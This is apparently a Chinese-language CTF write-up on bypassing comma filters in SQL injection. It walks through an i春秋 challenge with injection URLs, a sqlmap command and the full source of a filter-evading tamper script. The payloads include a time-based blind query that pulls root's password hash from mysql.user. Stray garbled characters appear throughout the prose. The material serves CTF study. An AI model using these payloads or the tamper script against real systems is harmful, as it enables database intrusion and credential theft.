最近做了一些CTF題目肺稀,發(fā)現(xiàn)sql題目很喜歡出過濾","的題目责蝠,借此機(jī)會特此總結(jié)。并且我有一個(gè)想法能夠通過編寫tamper盡量多的解決sql注入的題目肥卡。
在使用盲注的時(shí)候,需要使用到substr(),mid(),limit事镣。這些子句方法都需要使用到逗號步鉴。對于substr()和mid()這兩個(gè)方法可以使用from to的方式來解決:
select substr(database() from 1 for 1);
select mid(database() from 1 for 1);
使用join:
union select 1,2 #等價(jià)于
union select * from (select 1)a join (select 2)b
使用like:
select ascii(mid(user(),1,1))=80 #等價(jià)于
select user() like 'r%'
對于limit可以使用offset來繞過:
select * from news limit 0,1
# 等價(jià)于下面這條SQL語句
select * from news limit 1 offset 0
select * from table1 where id =1 and exists (select * from table2 where ord(substring(username from 1 for 1)=97);
127' UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)#
select case when substring((select password from mysql.user where user='root') from 1 for 1)='e' then sleep(5) else 0 end #
substring((select password from mysql.user where user='root') from -1)='e'
原文:https://blog.csdn.net/nzjdsds/article/details/81322529
例題1 i春秋百度杯九月場SQLI
https://www.ichunqiu.com/battalion?t=1&r=54791
首先在源代碼里有提示login.php,但是這是個(gè)假鏈接,真鏈接在header里l0gin.php
http://81abba4bbfd54553ab84f1969f4479dc0e3ad323bdca49b0.changame.ichunqiu.com/l0gin.php?id=1'
這里進(jìn)行模糊測試璃哟,看看過濾了哪些參數(shù)
參考:https://segmentfault.com/a/1190000018748071
https://www.4hou.com/vulnerable/6933.html
這里時(shí)第一次用fuzz氛琢,不太熟練,自己會在測試中逐漸加入自己的語句随闪,提高效率阳似,這里強(qiáng)行解釋一波
這里兩個(gè)文件長度應(yīng)該差1,但是缺差了9铐伴,點(diǎn)進(jìn)去看一下撮奏,發(fā)現(xiàn)俏讹,后面全都被截取了,應(yīng)該是過濾了逗號
這里我們使用
127' UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)#
這條語句
http://53574d90404b480e84e9c1d271100ceeb27c702c456643d4.game.ichunqiu.com/l0gin.php?id=1' union select * from (select database()) a join (select version() ) b %23
發(fā)現(xiàn)頁面正常畜吊,這里我們其實(shí)成功了但是只會顯示第一句因?yàn)槁?lián)合查詢第一個(gè)語句有結(jié)果的話就會出第一個(gè)語句的結(jié)果我們把1改為不存的值就行
查表名
查字段名
但是你這里會發(fā)現(xiàn)只出現(xiàn)了id泽疆,其實(shí)還有其他的但是位置不夠顯示不出來,這里我們用不了concat因?yàn)槲覀儾恢榔渌侄蔚拿植荒苈?lián)合玲献,concat_ws也不能用因?yàn)檫@個(gè)函數(shù)有逗號會失效殉疼,這里我就直接使用group_concat()直接把所有字段連在一起顯示出來而且不需要用到逗號
參考:http://www.reibang.com/p/5d34b3722128
利用sqlmap tamper 解決過濾逗號問題
python sqlmap.py -u "http://81abba4bbfd54553ab84f1969f4479dc0e3ad323bdca49b0.changame.ichunqiu.com/l0gin.php?id=1" -p id --level 3 --risk 3 --tamper=commalessmysql -v3 -D sqli -T users --columns
commalessmysql.py
#!/usr/bin/env python
"""
Writed by Ovie 2016-12-05
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces some instances with something whthout comma
Requirement:
* MySQL
Tested against:
* MySQL 5.0
>>> tamper('ISNULL(TIMESTAMPADD(MINUTE,7061,NULL))')
'ISNULL(NULL)'
>>> tamper('MID(VERSION(), 2, 1)')
'MID(VERSION() FROM 2 FOR 1)'
>>> tamper('IF(26=26,0,5)')
'CASE WHEN 26=26 THEN 0 ELSE 5 END'
>>> tamper('IFNULL(NULL,0x20)')
'CASE WHEN NULL=NULL THEN 0x20 ELSE NULL END'
>>> tamper('LIMIT 2, 3')
'LIMIT 3 OFFSET 2'
"""
def commalessif(payload):
if payload and payload.find("IF") > -1:
while payload.find("IF(") > -1:
index = payload.find("IF(")
depth = 1
comma1, comma2, end = None, None, None
for i in xrange(index + len("IF("), len(payload)):
if depth == 1 and payload[i] == ',' and not comma1:
comma1 = i
elif depth == 1 and payload[i] == ',' and comma1:
comma2 = i
elif depth == 1 and payload[i] == ')':
end = i
break
elif payload[i] == '(':
depth += 1
elif payload[i] == ')':
depth -= 1
if comma1 and comma2 and end:
_ = payload[index + len("IF("):comma1]
__ = payload[comma1 + 1:comma2]
___ = payload[comma2 + 1:end]
newVal = "CASE WHEN %s THEN %s ELSE %s END" % (_, __, ___)
payload = payload[:index] + newVal + payload[end + 1:]
else:
break
return payload
def commalessifnull(payload):
if payload and payload.find("IFNULL") > -1:
while payload.find("IFNULL(") > -1:
index = payload.find("IFNULL(")
depth = 1
comma, end = None, None
for i in xrange(index + len("IFNULL("), len(payload)):
if depth == 1 and payload[i] == ',':
comma = i
elif depth == 1 and payload[i] == ')':
end = i
break
elif payload[i] == '(':
depth += 1
elif payload[i] == ')':
depth -= 1
if comma and end:
_ = payload[index + len("IFNULL("):comma]
__ = payload[comma + 1:end].lstrip()
newVal = "CASE WHEN %s=NULL THEN %s ELSE %s END" % (_, __, _)
payload = payload[:index] + newVal + payload[end + 1:]
else:
break
return payload
retVal = payload
if payload:
retVal = re.sub(r'(?i)TIMESTAMPADD\(\w+,\d+,NULL\)', 'NULL', retVal)
retVal = re.sub(r'(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)', 'MID(\g<1> FROM \g<2> FOR \g<3>)', retVal)
retVal = commalessif(retVal)
retVal = commalessifnull(retVal)
retVal = re.sub(r'(?i)LIMIT\s*(\d+),\s*(\d+)', 'LIMIT \g<2> OFFSET \g<1>', retVal)
return retVal
參考:
http://www.reibang.com/p/5d34b3722128
https://www.jishuwen.com/d/2GA5
https://www.jishuwen.com/d/2c3j
https://www.cnblogs.com/Vinson404/p/7253255.html
